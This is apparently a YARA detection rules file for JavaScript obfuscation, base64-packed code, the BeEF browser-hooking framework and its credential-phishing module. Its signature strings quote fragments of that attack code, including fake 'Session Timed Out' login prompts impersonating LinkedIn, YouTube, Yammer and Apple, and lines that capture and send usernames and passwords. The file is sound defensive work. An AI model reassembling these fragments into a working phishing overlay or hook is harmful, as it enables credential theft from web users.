1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
rule generic_javascript_obfuscation
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "JavaScript Obfuscation Detection"
sample_filetype = "js-html"
strings:
$string0 = /eval\(([\s]+)?(unescape|atob)\(/ nocase
$string1 = /var([\s]+)?([a-zA-Z_$])+([a-zA-Z0-9_$]+)?([\s]+)?=([\s]+)?\[([\s]+)?\"\\x[0-9a-fA-F]+/ nocase
$string2 = /var([\s]+)?([a-zA-Z_$])+([a-zA-Z0-9_$]+)?([\s]+)?=([\s]+)?eval;/
condition:
any of them
}
rule possible_includes_base64_packed_functions
{
meta:
impact = 5
hide = true
desc = "Detects possible includes and packed functions"
strings:
$f = /(atob|btoa|;base64|base64,)/ nocase
//$ff = /(?:[A-Za-z0-9]{4}){2,}(?:[A-Za-z0-9]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9][AQgw]==)/ nocase
$fff = /([A-Za-z0-9]{4})*([A-Za-z0-9]{2}==|[A-Za-z0-9]{3}=|[A-Za-z0-9]{4})/
condition:
$f and $fff
}
rule BeEF_browser_hooked {
meta:
description = "Yara rule related to hook.js, BeEF Browser hooking capability"
author = "Pasquale Stirparo"
date = "2015-10-07"
hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db"
strings:
$s0 = "mitb.poisonAnchor" wide ascii
$s1 = "this.request(this.httpproto" wide ascii
$s2 = "beef.logger.get_dom_identifier" wide ascii
$s3 = "return (!!window.opera" wide ascii
$s4 = "history.pushState({ Be:\"EF\" }" wide ascii
$s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" wide ascii
$s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" wide ascii
$s7 = "window.navigator.userAgent.match(/Avant TriCore/)" wide ascii
$s8 = "window.navigator.userAgent.match(/Iceweasel" wide ascii
$s9 = "mitb.sniff(" wide ascii
$s10 = "Method XMLHttpRequest.open override" wide ascii
$s11 = ".browser.hasWebSocket" wide ascii
$s12 = ".mitb.poisonForm" wide ascii
$s13 = "resolved=require.resolve(file,cwd||" wide ascii
$s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" wide ascii
$s15 = "beef.net.request" wide ascii
$s16 = "uagent.search(engineOpera)" wide ascii
$s17 = "mitb.sniff" wide ascii
$s18 = "beef.logger.start" wide ascii
condition:
all of them
}
rule src_ptheft_command {
meta:
description = "Auto-generated rule - file command.js"
author = "Pasquale Stirparo"
reference = "not set"
date = "2015-10-08"
hash = "49c0e5400068924ff87729d9e1fece19acbfbd628d085f8df47b21519051b7f3"
strings:
$s0 = "var lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';" fullword wide ascii /* score: '38.00' */
$s1 = "dark=document.getElementById('darkenScreenObject'); " fullword wide ascii /* score: '21.00' */
$s2 = "beef.execute(function() {" fullword wide ascii /* score: '21.00' */
$s3 = "var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';" fullword wide ascii /* score: '32.42' */
$s4 = "description.text('Enter your Apple ID e-mail address and password');" fullword wide ascii /* score: '28.00' */
$s5 = "sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +ti" wide ascii /* score: '28.00' */
$s6 = "var logo = 'https://www.yammer.com/favicon.ico';" fullword wide ascii /* score: '27.42' */
$s7 = "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);" fullword wide ascii /* score: '26.00' */
$s8 = "var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';" fullword wide ascii /* score: '24.00' */
$s9 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';" fullword wide ascii /* score: '24.00' */
$s10 = "var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';" fullword wide ascii /* score: '24.00' */
$s11 = "var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';" fullword wide ascii /* score: '21.00' */
$s12 = "sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>For" wide ascii /* score: '23.00' */
$s13 = "inner.append(title, description, user,password);" fullword wide ascii /* score: '23.00' */
$s14 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
$s15 = "sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_bar" wide ascii /* score: '23.00' */
$s16 = "answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;" fullword wide ascii /* score: '22.00' */
$s17 = "password.keydown(function(event) {" fullword wide ascii /* score: '21.01' */
condition:
13 of them
}